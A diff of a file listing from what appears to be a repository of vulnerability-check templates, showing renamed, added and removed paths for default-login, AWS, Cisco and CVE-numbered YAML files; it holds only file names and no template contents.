./poc/auth/versa-director-login.yaml ./poc/auth/versa-flexvnf-default-login.yaml @@ -3993,11 +3993,11 @@ ./poc/auth/wpdm-cache-session-11436.yaml ./poc/auth/wpdm-cache-session-11437.yaml ./poc/auth/wpdm-cache-session-11438.yaml -./poc/auth/wpdm-cache-session-11439.yaml +./poc/auth/wpdm-cache-session.yaml ./poc/auth/wpmudev-pub-keys-11504.yaml ./poc/auth/wpmudev-pub-keys-11505.yaml ./poc/auth/wpmudev-pub-keys-11506.yaml -./poc/auth/wpmudev-pub-keys.yaml +./poc/auth/wpmudev-pub-keys-11507.yaml ./poc/auth/wps-hide-login-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/wps-hide-login-dfde3550b45206f37db3200b5123c77e.yaml ./poc/auth/wps-hide-login.yaml @@ -4025,7 +4025,7 @@ ./poc/auth/xerox-workcentre7-default-password.yaml ./poc/auth/xerox7-default-login-11678.yaml ./poc/auth/xerox7-default-login-11679.yaml -./poc/auth/xerox7-default-login-11680.yaml +./poc/auth/xerox7-default-login.yaml ./poc/auth/xerox7-default-password.yaml ./poc/auth/xiaomi-wireless-router-login.yaml ./poc/auth/xibocms-login.yaml @@ -4067,7 +4067,7 @@ ./poc/auth/zabbix-default-login-11760.yaml ./poc/auth/zabbix-default-login-11761.yaml ./poc/auth/zabbix-default-login-11762.yaml -./poc/auth/zabbix-default-login-11763.yaml +./poc/auth/zabbix-default-login.yaml ./poc/auth/zabbix-default-password.yml ./poc/auth/zabbix-server-login-11767.yaml ./poc/auth/zabbix-server-login-11768.yaml @@ -4155,8 +4155,8 @@ ./poc/aws/amazon-sns-topic-disclosure-detect.yaml ./poc/aws/amazon-sns-topic.yaml ./poc/aws/amazon-web-services-phish.yaml -./poc/aws/aws-access-id-618.yaml ./poc/aws/aws-access-id-619.yaml +./poc/aws/aws-access-id-620.yaml ./poc/aws/aws-access-id.yaml ./poc/aws/aws-access-key-value-621.yaml ./poc/aws/aws-access-key-value-622.yaml @@ -4197,17 +4197,17 @@ ./poc/aws/aws-metadata.yaml ./poc/aws/aws-mfa-not-enabled.yaml ./poc/aws/aws-object-listing-645.yaml -./poc/aws/aws-object-listing-646.yaml ./poc/aws/aws-object-listing-647.yaml ./poc/aws/aws-object-listing-648.yaml +./poc/aws/aws-object-listing.yaml ./poc/aws/aws-opensearch-login-649.yaml ./poc/aws/aws-opensearch-login-650.yaml ./poc/aws/aws-opensearch-login.yaml ./poc/aws/aws-rds-cluster.yaml ./poc/aws/aws-redirect-651.yaml -./poc/aws/aws-redirect-652.yaml ./poc/aws/aws-redirect-653.yaml ./poc/aws/aws-redirect-654.yaml +./poc/aws/aws-redirect.yaml ./poc/aws/aws-s3-bucket-enum.yaml ./poc/aws/aws-s3-explorer.yaml ./poc/aws/aws-s3-misconfig.yaml @@ -4226,7 +4226,7 @@ ./poc/aws/awstats-script-2.yaml ./poc/aws/awstats-script-3.yaml ./poc/aws/awstats-script-657.yaml -./poc/aws/awstats-script.yaml +./poc/aws/awstats-script-658.yaml ./poc/aws/better-wp-security-98350ec2f0372815b32ecf23bf7915d4.yaml ./poc/aws/blobinator-aa5c7bd4b6ffb22da2a734c30c9bec28.yaml ./poc/aws/bp-group-documents-dd99678e1269634eec22746d04dd5202.yaml @@ -4477,9 +4477,9 @@ ./poc/backup/zip-backup-files-8.yaml ./poc/backup/zip-backup-files-9.yaml ./poc/backup/zip-backup-files.yaml +./poc/cisco/cisco-ace-device-manager-929.yaml ./poc/cisco/cisco-ace-device-manager-930.yaml ./poc/cisco/cisco-ace-device-manager-931.yaml -./poc/cisco/cisco-ace-device-manager.yaml ./poc/cisco/cisco-acs.yaml ./poc/cisco/cisco-anyconnect-vpn.yaml ./poc/cisco/cisco-asa-honeypot-detection.yaml @@ -4519,14 +4519,14 @@ ./poc/cisco/cisco-network-config.yaml ./poc/cisco/cisco-nexus-data-broker.yaml ./poc/cisco/cisco-onprem-panel.yaml -./poc/cisco/cisco-prime-infrastructure-952.yaml ./poc/cisco/cisco-prime-infrastructure-953.yaml ./poc/cisco/cisco-prime-infrastructure-954.yaml +./poc/cisco/cisco-prime-infrastructure.yaml ./poc/cisco/cisco-prime-network-registrar.yaml ./poc/cisco/cisco-rv-series-rce.yaml -./poc/cisco/cisco-sd-wan-955.yaml ./poc/cisco/cisco-sd-wan-956.yaml ./poc/cisco/cisco-sd-wan-957.yaml +./poc/cisco/cisco-sd-wan.yaml ./poc/cisco/cisco-secure-cn-959.yaml ./poc/cisco/cisco-secure-cn.yaml ./poc/cisco/cisco-secure-desktop-961.yaml @@ -4544,9 +4544,9 @@ ./poc/cisco/cisco-smi-exposure-972.yaml ./poc/cisco/cisco-smi-exposure.yaml ./poc/cisco/cisco-ssl-vpn.yaml -./poc/cisco/cisco-systems-login-973.yaml ./poc/cisco/cisco-systems-login-974.yaml ./poc/cisco/cisco-systems-login-975.yaml +./poc/cisco/cisco-systems-login.yaml ./poc/cisco/cisco-telepresence-977.yaml ./poc/cisco/cisco-telepresence-978.yaml ./poc/cisco/cisco-telepresence.yaml @@ -4592,7 +4592,7 @@ ./poc/coldfusion/coldfusion-administrator-login-1144.yaml ./poc/coldfusion/coldfusion-administrator-login-1145.yaml ./poc/coldfusion/coldfusion-administrator-login-1146.yaml -./poc/coldfusion/coldfusion-administrator-login-1147.yaml +./poc/coldfusion/coldfusion-administrator-login.yaml ./poc/coldfusion/coldfusion-cve-2010-2861-lfi.yml ./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-debug-xss-1.yaml @@ -4717,8 +4717,8 @@ ./poc/config/configuration-listing-1181.yaml ./poc/config/configuration-listing-1182.yaml ./poc/config/configuration-listing-1183.yaml +./poc/config/configuration-listing-1184.yaml ./poc/config/configuration-listing-1185.yaml -./poc/config/configuration-listing.yaml ./poc/config/configure-aaa-service.yaml ./poc/config/configure-service-timestamps-debug.yaml ./poc/config/configure-service-timestamps-logmessages.yaml @@ -4732,10 +4732,10 @@ ./poc/config/confluence-detect-1186.yaml ./poc/config/confluence-detect-1187.yaml ./poc/config/confluence-detect-1188.yaml -./poc/config/confluence-detect-1189.yaml ./poc/config/confluence-detect-2.yaml ./poc/config/confluence-detect-3.yaml ./poc/config/confluence-detect-4.yaml +./poc/config/confluence-detect.yaml ./poc/config/confluence-oauth-admin.yaml ./poc/config/confluence-ssrf-sharelinks-1190.yaml ./poc/config/confluence-ssrf-sharelinks-1191.yaml @@ -4879,7 +4879,7 @@ ./poc/config/honeywell-scada-config-7989.yaml ./poc/config/honeywell-scada-config-7990.yaml ./poc/config/honeywell-scada-config-7991.yaml -./poc/config/honeywell-scada-config.yaml +./poc/config/honeywell-scada-config-7992.yaml ./poc/config/htaccess-config-8042.yaml ./poc/config/htaccess-config-8043.yaml ./poc/config/htaccess-config-8044.yaml @@ -5155,6 +5155,7 @@ ./poc/cpanel/cpanel-api-codes.yaml ./poc/cpanel/cpanel-detection.yaml ./poc/cpanel/cpanel.yaml +./poc/crlf_injection/CRLF.yaml ./poc/crlf_injection/XSS_CRLF_Injection.yaml ./poc/crlf_injection/crlf-1266.yaml ./poc/crlf_injection/crlf-extended.yaml @@ -5189,12 +5190,11 @@ ./poc/cross_site_request_forgery/csrf-token-missing.yaml ./poc/cross_site_request_forgery/csrf.yaml ./poc/cross_site_request_forgery/csrf2.yaml +./poc/cross_site_request_forgery/csrfguard-detect-1290.yaml ./poc/cross_site_request_forgery/csrfguard-detect-1291.yaml -./poc/cross_site_request_forgery/csrfguard-detect.yaml ./poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml ./poc/cross_site_request_forgery/drupal_module-cloud-csrf.yaml ./poc/cross_site_request_forgery/hidden-csrf-token.yaml -./poc/cve/ CVE-2023-6389.yaml ./poc/cve/._CVE-2022-22965.yaml ./poc/cve/CNNVD-200705-315.yaml ./poc/cve/CNNVD-201412-193.yaml @@ -5271,7 +5271,6 @@ ./poc/cve/CNVD-2020-58823.yaml ./poc/cve/CNVD-2020-62422.yaml ./poc/cve/CNVD-2020-67113.yaml -./poc/cve/CNVD-2020-68596.yaml ./poc/cve/CNVD-2020-73282.yaml ./poc/cve/CNVD-2021-01931.yaml ./poc/cve/CNVD-2021-04128.yaml @@ -5280,7 +5279,6 @@ ./poc/cve/CNVD-2021-10543.yaml ./poc/cve/CNVD-2021-14536.yaml ./poc/cve/CNVD-2021-15822.yaml -./poc/cve/CNVD-2021-15824.yaml ./poc/cve/CNVD-2021-17369.yaml ./poc/cve/CNVD-2021-26422.yaml ./poc/cve/CNVD-2021-28277.yaml @@ -5491,7 +5489,6 @@ ./poc/cve/CVE-2009-0932.yaml ./poc/cve/CVE-2009-0968.yaml ./poc/cve/CVE-2009-1030.yaml -./poc/cve/CVE-2009-1151.yaml ./poc/cve/CVE-2009-1496.yaml ./poc/cve/CVE-2009-1558.yaml ./poc/cve/CVE-2009-1872.yaml @@ -5602,8 +5599,8 @@ ./poc/cve/CVE-2010-1723.yaml ./poc/cve/CVE-2010-1858.yaml ./poc/cve/CVE-2010-1870.yaml -./poc/cve/CVE-2010-1871-2.yaml ./poc/cve/CVE-2010-1871.yaml +./poc/cve/CVE-2010-1871.yml ./poc/cve/CVE-2010-1873.yaml ./poc/cve/CVE-2010-1875.yaml ./poc/cve/CVE-2010-1878.yaml @@ -6628,7 +6625,6 @@ ./poc/cve/CVE-2015-2973.yaml ./poc/cve/CVE-2015-2996.yaml ./poc/cve/CVE-2015-3173.yaml -./poc/cve/CVE-2015-3224.yaml ./poc/cve/CVE-2015-3299.yaml ./poc/cve/CVE-2015-3300.yaml ./poc/cve/CVE-2015-3301.yaml @@ -6696,6 +6692,7 @@ ./poc/cve/CVE-2015-5151.yaml ./poc/cve/CVE-2015-5227.yaml ./poc/cve/CVE-2015-5308.yaml +./poc/cve/CVE-2015-5354.yaml ./poc/cve/CVE-2015-5461.yaml ./poc/cve/CVE-2015-5468.yaml ./poc/cve/CVE-2015-5469.yaml @@ -7267,7 +7264,6 @@ ./poc/cve/CVE-2016-8527.yaml ./poc/cve/CVE-2016-9263.yaml ./poc/cve/CVE-2017-0929.yaml -./poc/cve/CVE-2017-1000027.yaml ./poc/cve/CVE-2017-1000028.yaml ./poc/cve/CVE-2017-1000029.yaml ./poc/cve/CVE-2017-1000033.yaml @@ -7707,6 +7703,7 @@ ./poc/cve/CVE-2018-10102.yaml ./poc/cve/CVE-2018-10141.yaml ./poc/cve/CVE-2018-10201.yaml +./poc/cve/CVE-2018-10230.yaml ./poc/cve/CVE-2018-10233.yaml ./poc/cve/CVE-2018-10234.yaml ./poc/cve/CVE-2018-10300.yaml @@ -7731,6 +7728,7 @@ ./poc/cve/CVE-2018-10969.yaml ./poc/cve/CVE-2018-11105.yaml ./poc/cve/CVE-2018-11227.yaml +./poc/cve/CVE-2018-11231.yaml ./poc/cve/CVE-2018-11244.yaml ./poc/cve/CVE-2018-11309.yaml ./poc/cve/CVE-2018-11366.yaml @@ -7738,7 +7736,6 @@ ./poc/cve/CVE-2018-11473.yaml ./poc/cve/CVE-2018-11485.yaml ./poc/cve/CVE-2018-11486.yaml -./poc/cve/CVE-2018-11510.yaml ./poc/cve/CVE-2018-11515.yaml ./poc/cve/CVE-2018-11525.yaml ./poc/cve/CVE-2018-11526.yaml @@ -7802,8 +7799,10 @@ ./poc/cve/CVE-2018-15473.yaml ./poc/cve/CVE-2018-15517.yaml ./poc/cve/CVE-2018-15531.yaml +./poc/cve/CVE-2018-15535.yaml ./poc/cve/CVE-2018-15571.yaml ./poc/cve/CVE-2018-15640.yaml +./poc/cve/CVE-2018-15657.yaml ./poc/cve/CVE-2018-15745.yaml ./poc/cve/CVE-2018-15818.yaml ./poc/cve/CVE-2018-15876.yaml @@ -7872,6 +7871,7 @@ ./poc/cve/CVE-2018-18608.yaml ./poc/cve/CVE-2018-18775.yaml ./poc/cve/CVE-2018-18777.yaml +./poc/cve/CVE-2018-18778.yaml ./poc/cve/CVE-2018-18809.yaml ./poc/cve/CVE-2018-18872.yaml ./poc/cve/CVE-2018-18919.yaml @@ -7881,7 +7881,6 @@ ./poc/cve/CVE-2018-19042.yaml ./poc/cve/CVE-2018-19043.yaml ./poc/cve/CVE-2018-19127.yaml -./poc/cve/CVE-2018-19136.yaml ./poc/cve/CVE-2018-19207.yaml ./poc/cve/CVE-2018-19287.yaml ./poc/cve/CVE-2018-19326.yaml @@ -7896,12 +7895,12 @@ ./poc/cve/CVE-2018-19488.yaml ./poc/cve/CVE-2018-19518.yaml ./poc/cve/CVE-2018-19564.yaml -./poc/cve/CVE-2018-19751.yaml +./poc/cve/CVE-2018-19749.yaml +./poc/cve/CVE-2018-19752.yaml ./poc/cve/CVE-2018-19753.yaml ./poc/cve/CVE-2018-19796.yaml -./poc/cve/CVE-2018-19877.yaml ./poc/cve/CVE-2018-19914.yaml -./poc/cve/CVE-2018-20010.yaml +./poc/cve/CVE-2018-19915.yaml ./poc/cve/CVE-2018-20062.yaml ./poc/cve/CVE-2018-20101.yaml ./poc/cve/CVE-2018-20147.yaml @@ -8113,7 +8112,6 @@ ./poc/cve/CVE-2019-1010257.yaml ./poc/cve/CVE-2019-1010287.yaml ./poc/cve/CVE-2019-1010290.yaml -./poc/cve/CVE-2019-10232.yaml ./poc/cve/CVE-2019-10270.yaml ./poc/cve/CVE-2019-10271.yaml ./poc/cve/CVE-2019-10405.yaml @@ -8125,7 +8123,7 @@ ./poc/cve/CVE-2019-10866.yaml ./poc/cve/CVE-2019-10869.yaml ./poc/cve/CVE-2019-11013.yaml -./poc/cve/CVE-2019-11043 (copy 2).yaml +./poc/cve/CVE-2019-11043 (copy 1).yaml ./poc/cve/CVE-2019-11043.yaml ./poc/cve/CVE-2019-11185.yaml ./poc/cve/CVE-2019-11223.yaml @@ -8133,6 +8131,7 @@ ./poc/cve/CVE-2019-11510.yaml ./poc/cve/CVE-2019-11557.yaml ./poc/cve/CVE-2019-11565.yaml +./poc/cve/CVE-2019-11580.yaml ./poc/cve/CVE-2019-11581 2.yaml ./poc/cve/CVE-2019-11581.yaml ./poc/cve/CVE-2019-11590.yaml @@ -8169,12 +8168,11 @@ ./poc/cve/CVE-2019-12986.yaml ./poc/cve/CVE-2019-12987.yaml ./poc/cve/CVE-2019-12988.yaml -./poc/cve/CVE-2019-13101.yaml ./poc/cve/CVE-2019-13275.yaml ./poc/cve/CVE-2019-13344.yaml ./poc/cve/CVE-2019-13392.yaml +./poc/cve/CVE-2019-13396 (copy 1).yaml ./poc/cve/CVE-2019-13396 2.yaml -./poc/cve/CVE-2019-13396.yaml ./poc/cve/CVE-2019-13413.yaml ./poc/cve/CVE-2019-13414.yaml ./poc/cve/CVE-2019-13462.yaml @@ -8406,7 +8404,6 @@ ./poc/cve/CVE-2019-17236.yaml ./poc/cve/CVE-2019-17237.yaml ./poc/cve/CVE-2019-17239.yaml -./poc/cve/CVE-2019-17270.yaml ./poc/cve/CVE-2019-17382.yaml ./poc/cve/CVE-2019-17384.yaml ./poc/cve/CVE-2019-17385.yaml @@ -8433,6 +8430,7 @@ ./poc/cve/CVE-2019-1821.yaml ./poc/cve/CVE-2019-18393.yaml ./poc/cve/CVE-2019-18394.yaml +./poc/cve/CVE-2019-18665.yaml ./poc/cve/CVE-2019-18668.yaml ./poc/cve/CVE-2019-18818.yaml ./poc/cve/CVE-2019-18834.yaml @@ -8510,6 +8508,7 @@ ./poc/cve/CVE-2019-2588.yaml ./poc/cve/CVE-2019-2616.yaml ./poc/cve/CVE-2019-2725.yaml +./poc/cve/CVE-2019-2729.yaml ./poc/cve/CVE-2019-3396.yaml ./poc/cve/CVE-2019-3398.yaml ./poc/cve/CVE-2019-3401.yaml @@ -8520,6 +8519,7 @@ ./poc/cve/CVE-2019-3929.yaml ./poc/cve/CVE-2019-4061.yaml ./poc/cve/CVE-2019-5129.yaml +./poc/cve/CVE-2019-5418-2 copy.yaml ./poc/cve/CVE-2019-5418-2.yaml ./poc/cve/CVE-2019-5418.yaml ./poc/cve/CVE-2019-5434.yaml @@ -8580,6 +8580,7 @@ ./poc/cve/CVE-2019-8942.yaml ./poc/cve/CVE-2019-8943.yaml ./poc/cve/CVE-2019-8982.yaml +./poc/cve/CVE-2019-9041.yaml ./poc/cve/CVE-2019-9082.yaml ./poc/cve/CVE-2019-9168.yaml ./poc/cve/CVE-2019-9567.yaml @@ -8590,6 +8591,7 @@ ./poc/cve/CVE-2019-9576.yaml ./poc/cve/CVE-2019-9618.yaml ./poc/cve/CVE-2019-9646.yaml +./poc/cve/CVE-2019-9670.yaml ./poc/cve/CVE-2019-9726.yaml ./poc/cve/CVE-2019-9733.yaml ./poc/cve/CVE-2019-9787.yaml @@ -8603,13 +8605,13 @@ ./poc/cve/CVE-2019-9912.yaml ./poc/cve/CVE-2019-9913.yaml ./poc/cve/CVE-2019-9914.yaml -./poc/cve/CVE-2019-9915.yaml +./poc/cve/CVE-2019-9922.yaml ./poc/cve/CVE-2019-9955.yaml ./poc/cve/CVE-2019-9978 2.yaml ./poc/cve/CVE-2019-9978.yaml ./poc/cve/CVE-2020-0618.yaml ./poc/cve/CVE-2020-0646.yaml -./poc/cve/CVE-2020-10124 (copy 1).yaml +./poc/cve/CVE-2020-10124.yaml ./poc/cve/CVE-2020-10148 (copy 2).yaml ./poc/cve/CVE-2020-10148 2.yaml ./poc/cve/CVE-2020-10148.yaml @@ -8626,7 +8628,6 @@ ./poc/cve/CVE-2020-10549.yaml ./poc/cve/CVE-2020-10564.yaml ./poc/cve/CVE-2020-10568.yaml -./poc/cve/CVE-2020-10770.yaml ./poc/cve/CVE-2020-10817.yaml ./poc/cve/CVE-2020-10973.yaml ./poc/cve/CVE-2020-11025.yaml @@ -8656,7 +8657,7 @@ ./poc/cve/CVE-2020-11548.yaml ./poc/cve/CVE-2020-11581.yaml ./poc/cve/CVE-2020-11673.yaml -./poc/cve/CVE-2020-11710 (copy 2).yaml +./poc/cve/CVE-2020-11710 (copy 1).yaml ./poc/cve/CVE-2020-11710.yaml ./poc/cve/CVE-2020-11727.yaml ./poc/cve/CVE-2020-11731.yaml @@ -8697,14 +8698,15 @@ ./poc/cve/CVE-2020-12800.yaml ./poc/cve/CVE-2020-12832.yaml ./poc/cve/CVE-2020-13117.yaml -./poc/cve/CVE-2020-13121.yaml ./poc/cve/CVE-2020-13125.yaml ./poc/cve/CVE-2020-13126.yaml +./poc/cve/CVE-2020-13158.yaml ./poc/cve/CVE-2020-13167 2.yaml ./poc/cve/CVE-2020-13167.yaml ./poc/cve/CVE-2020-13258.yaml ./poc/cve/CVE-2020-13379.yaml ./poc/cve/CVE-2020-13379_重复副本.yaml +./poc/cve/CVE-2020-13405.yaml ./poc/cve/CVE-2020-13426.yaml ./poc/cve/CVE-2020-13483.yaml ./poc/cve/CVE-2020-13487.yaml @@ -8743,9 +8745,9 @@ ./poc/cve/CVE-2020-14882 2.yaml ./poc/cve/CVE-2020-14882-1.yaml ./poc/cve/CVE-2020-14882-2 2.yaml -./poc/cve/CVE-2020-14882-2-2.yaml ./poc/cve/CVE-2020-14882-2.yaml ./poc/cve/CVE-2020-14882.yaml +./poc/cve/CVE-2020-14883.yaml ./poc/cve/CVE-2020-14959.yaml ./poc/cve/CVE-2020-14962.yaml ./poc/cve/CVE-2020-15004.yaml @@ -8767,7 +8769,6 @@ ./poc/cve/CVE-2020-15535.yaml ./poc/cve/CVE-2020-15536.yaml ./poc/cve/CVE-2020-15537.yaml -./poc/cve/CVE-2020-15568.yaml ./poc/cve/CVE-2020-15867.yaml ./poc/cve/CVE-2020-15895.yaml ./poc/cve/CVE-2020-15920.yaml @@ -8781,7 +8782,7 @@ ./poc/cve/CVE-2020-17453.yaml ./poc/cve/CVE-2020-17456.yaml ./poc/cve/CVE-2020-17463.yaml -./poc/cve/CVE-2020-17496.yaml +./poc/cve/CVE-2020-17505.yaml ./poc/cve/CVE-2020-17506.yaml ./poc/cve/CVE-2020-17518.yaml ./poc/cve/CVE-2020-17519.yaml @@ -8790,10 +8791,9 @@ ./poc/cve/CVE-2020-17558.yaml ./poc/cve/CVE-2020-18268.yaml ./poc/cve/CVE-2020-19282.yaml -./poc/cve/CVE-2020-19283.yaml ./poc/cve/CVE-2020-19295.yaml -./poc/cve/CVE-2020-19360.yaml -./poc/cve/CVE-2020-1956.yaml +./poc/cve/CVE-2020-1938.yaml +./poc/cve/CVE-2020-1943.yaml ./poc/cve/CVE-2020-1957.yaml ./poc/cve/CVE-2020-19625.yaml ./poc/cve/CVE-2020-19625_重复副本.yaml @@ -8811,6 +8811,7 @@ ./poc/cve/CVE-2020-2096 2.yaml ./poc/cve/CVE-2020-2096.yaml ./poc/cve/CVE-2020-20982.yaml +./poc/cve/CVE-2020-20988.yaml ./poc/cve/CVE-2020-21012.yaml ./poc/cve/CVE-2020-2103.yaml ./poc/cve/CVE-2020-21224.yaml @@ -8848,7 +8849,6 @@ ./poc/cve/CVE-2020-24314.yaml ./poc/cve/CVE-2020-24315.yaml ./poc/cve/CVE-2020-24316.yaml -./poc/cve/CVE-2020-24391.yaml ./poc/cve/CVE-2020-24550.yaml ./poc/cve/CVE-2020-24571.yaml ./poc/cve/CVE-2020-24579.yaml @@ -8868,15 +8868,18 @@ ./poc/cve/CVE-2020-24949.yaml ./poc/cve/CVE-2020-24949_重复副本.yaml ./poc/cve/CVE-2020-25033.yaml +./poc/cve/CVE-2020-25078.yaml ./poc/cve/CVE-2020-25200.yaml ./poc/cve/CVE-2020-25213 (copy 2).yaml ./poc/cve/CVE-2020-25213 2.yaml ./poc/cve/CVE-2020-25213.yaml +./poc/cve/CVE-2020-25223.yaml ./poc/cve/CVE-2020-25286.yaml ./poc/cve/CVE-2020-25375.yaml ./poc/cve/CVE-2020-25378.yaml ./poc/cve/CVE-2020-25379.yaml ./poc/cve/CVE-2020-25380.yaml +./poc/cve/CVE-2020-25495.yaml ./poc/cve/CVE-2020-25506.yaml ./poc/cve/CVE-2020-2551.yaml ./poc/cve/CVE-2020-25540.yaml @@ -8896,6 +8899,7 @@ ./poc/cve/CVE-2020-26596.yaml ./poc/cve/CVE-2020-26672.yaml ./poc/cve/CVE-2020-26876.yaml +./poc/cve/CVE-2020-26919.yaml ./poc/cve/CVE-2020-26948.yaml ./poc/cve/CVE-2020-27191.yaml ./poc/cve/CVE-2020-2733.yaml @@ -8923,10 +8927,10 @@ ./poc/cve/CVE-2020-28188.yaml ./poc/cve/CVE-2020-28208.yaml ./poc/cve/CVE-2020-28339.yaml -./poc/cve/CVE-2020-28351.yaml ./poc/cve/CVE-2020-28649.yaml ./poc/cve/CVE-2020-28650.yaml ./poc/cve/CVE-2020-28707.yaml +./poc/cve/CVE-2020-28871.yaml ./poc/cve/CVE-2020-28976.yaml ./poc/cve/CVE-2020-28977.yaml ./poc/cve/CVE-2020-28978.yaml @@ -8957,21 +8961,19 @@ ./poc/cve/CVE-2020-35489 (copy 1).yaml ./poc/cve/CVE-2020-35489.yaml ./poc/cve/CVE-2020-35572.yaml -./poc/cve/CVE-2020-35580.yaml ./poc/cve/CVE-2020-35589.yaml ./poc/cve/CVE-2020-35590.yaml ./poc/cve/CVE-2020-35598.yaml ./poc/cve/CVE-2020-35613.yaml -./poc/cve/CVE-2020-35713.yaml ./poc/cve/CVE-2020-35729.yaml ./poc/cve/CVE-2020-35736.yaml ./poc/cve/CVE-2020-35748.yaml ./poc/cve/CVE-2020-35749.yaml ./poc/cve/CVE-2020-35773.yaml -./poc/cve/CVE-2020-35774.yaml ./poc/cve/CVE-2020-3580.yaml ./poc/cve/CVE-2020-35846.yaml ./poc/cve/CVE-2020-35847.yaml +./poc/cve/CVE-2020-35848.yaml ./poc/cve/CVE-2020-35932.yaml ./poc/cve/CVE-2020-35933.yaml ./poc/cve/CVE-2020-35934.yaml @@ -9127,6 +9129,7 @@ ./poc/cve/CVE-2020-6167.yaml ./poc/cve/CVE-2020-6168.yaml ./poc/cve/CVE-2020-6171.yaml +./poc/cve/CVE-2020-6207.yaml ./poc/cve/CVE-2020-6287.yaml ./poc/cve/CVE-2020-6308.yaml ./poc/cve/CVE-2020-6637.yaml @@ -9149,7 +9152,6 @@ ./poc/cve/CVE-2020-7241.yaml ./poc/cve/CVE-2020-7246.yaml ./poc/cve/CVE-2020-7247.yaml -./poc/cve/CVE-2020-7318.yaml ./poc/cve/CVE-2020-7473 (copy 1).yaml ./poc/cve/CVE-2020-7473.yaml ./poc/cve/CVE-2020-7796.yaml @@ -9157,11 +9159,11 @@ ./poc/cve/CVE-2020-7947.yaml ./poc/cve/CVE-2020-7948.yaml ./poc/cve/CVE-2020-7961.yaml +./poc/cve/CVE-2020-7980.yaml ./poc/cve/CVE-2020-8091.yaml ./poc/cve/CVE-2020-8115.yaml ./poc/cve/CVE-2020-8163 2.yaml ./poc/cve/CVE-2020-8163.yaml -./poc/cve/CVE-2020-8191.yaml ./poc/cve/CVE-2020-8193.yaml ./poc/cve/CVE-2020-8194.yaml ./poc/cve/CVE-2020-8203.yaml @@ -9173,7 +9175,6 @@ ./poc/cve/CVE-2020-8435.yaml ./poc/cve/CVE-2020-8436.yaml ./poc/cve/CVE-2020-8451.yaml -./poc/cve/CVE-2020-8497.yaml ./poc/cve/CVE-2020-8498.yaml ./poc/cve/CVE-2020-8512.yaml ./poc/cve/CVE-2020-8515.yaml @@ -9183,7 +9184,6 @@ ./poc/cve/CVE-2020-8615.yaml ./poc/cve/CVE-2020-8641.yaml ./poc/cve/CVE-2020-8644.yaml -./poc/cve/CVE-2020-8654.yaml ./poc/cve/CVE-2020-8658.yaml ./poc/cve/CVE-2020-8771.yaml ./poc/cve/CVE-2020-8772-my.yaml @@ -9196,6 +9196,7 @@ ./poc/cve/CVE-2020-9003.yaml ./poc/cve/CVE-2020-9006.yaml ./poc/cve/CVE-2020-9019.yaml +./poc/cve/CVE-2020-9036.yaml ./poc/cve/CVE-2020-9043.yaml ./poc/cve/CVE-2020-9047.yaml ./poc/cve/CVE-2020-9054 2.yaml @@ -9223,25 +9224,22 @@ ./poc/cve/CVE-2020-9466.yaml ./poc/cve/CVE-2020-9483.yaml ./poc/cve/CVE-2020-9484.yaml -./poc/cve/CVE-2020-9490.yaml +./poc/cve/CVE-2020-9496.yaml ./poc/cve/CVE-2020-9514.yaml ./poc/cve/CVE-2020-9757.yaml -./poc/cve/CVE-20200924a.yaml ./poc/cve/CVE-2020–26073 (copy 1).yaml ./poc/cve/CVE-2020–26073.yaml ./poc/cve/CVE-2021-1472.yaml ./poc/cve/CVE-2021-1497.yaml ./poc/cve/CVE-2021-1498.yaml -./poc/cve/CVE-2021-1499.yaml ./poc/cve/CVE-2021-20031.yaml ./poc/cve/CVE-2021-20038.yaml ./poc/cve/CVE-2021-20083.yaml -./poc/cve/CVE-2021-20090.yaml ./poc/cve/CVE-2021-20091.yaml ./poc/cve/CVE-2021-20092.yaml -./poc/cve/CVE-2021-20114.yaml ./poc/cve/CVE-2021-20123.yaml ./poc/cve/CVE-2021-20124.yaml +./poc/cve/CVE-2021-20137.yaml ./poc/cve/CVE-2021-20150.yaml ./poc/cve/CVE-2021-20158.yaml ./poc/cve/CVE-2021-20167.yaml @@ -9258,7 +9256,6 @@ ./poc/cve/CVE-2021-20782.yaml ./poc/cve/CVE-2021-20792.yaml ./poc/cve/CVE-2021-20831.yaml -./poc/cve/CVE-2021-20837.yaml ./poc/cve/CVE-2021-20840.yaml ./poc/cve/CVE-2021-20846.yaml ./poc/cve/CVE-2021-20851.yaml @@ -9271,17 +9268,15 @@ ./poc/cve/CVE-2021-21287.yaml ./poc/cve/CVE-2021-21307.yaml ./poc/cve/CVE-2021-21311.yaml -./poc/cve/CVE-2021-21315.yaml ./poc/cve/CVE-2021-21345.yaml ./poc/cve/CVE-2021-21351.yaml ./poc/cve/CVE-2021-21389.yaml ./poc/cve/CVE-2021-21402.yaml ./poc/cve/CVE-2021-21479.yaml +./poc/cve/CVE-2021-21745.yaml ./poc/cve/CVE-2021-21801.yaml ./poc/cve/CVE-2021-21802.yaml ./poc/cve/CVE-2021-21803.yaml -./poc/cve/CVE-2021-21805.yaml -./poc/cve/CVE-2021-21816.yaml ./poc/cve/CVE-2021-21881.yaml ./poc/cve/CVE-2021-21972.yaml ./poc/cve/CVE-2021-21973.yaml @@ -9289,10 +9284,10 @@ ./poc/cve/CVE-2021-21978.yaml ./poc/cve/CVE-2021-21985.yaml ./poc/cve/CVE-2021-22053.yaml +./poc/cve/CVE-2021-22054.yaml ./poc/cve/CVE-2021-22122.yaml ./poc/cve/CVE-2021-22123.yaml ./poc/cve/CVE-2021-22145.yaml -./poc/cve/CVE-2021-22205.yaml ./poc/cve/CVE-2021-22214.yaml ./poc/cve/CVE-2021-22502.yaml ./poc/cve/CVE-2021-22707.yaml @@ -9303,6 +9298,7 @@ ./poc/cve/CVE-2021-23174.yaml ./poc/cve/CVE-2021-23209.yaml ./poc/cve/CVE-2021-23227.yaml +./poc/cve/CVE-2021-23241.yaml ./poc/cve/CVE-2021-24123.yaml ./poc/cve/CVE-2021-24124.yaml ./poc/cve/CVE-2021-24125.yaml @@ -10321,7 +10317,6 @@ ./poc/cve/CVE-2021-27349.yaml ./poc/cve/CVE-2021-27358.yaml ./poc/cve/CVE-2021-27519-test.yaml -./poc/cve/CVE-2021-27519.yaml ./poc/cve/CVE-2021-27520.yaml ./poc/cve/CVE-2021-27561.yaml ./poc/cve/CVE-2021-27648.yaml @@ -10341,6 +10336,7 @@ ./poc/cve/CVE-2021-28918.yaml ./poc/cve/CVE-2021-28937.yaml ./poc/cve/CVE-2021-29115.yaml +./poc/cve/CVE-2021-29156.yaml ./poc/cve/CVE-2021-29203.yaml ./poc/cve/CVE-2021-29441.yaml 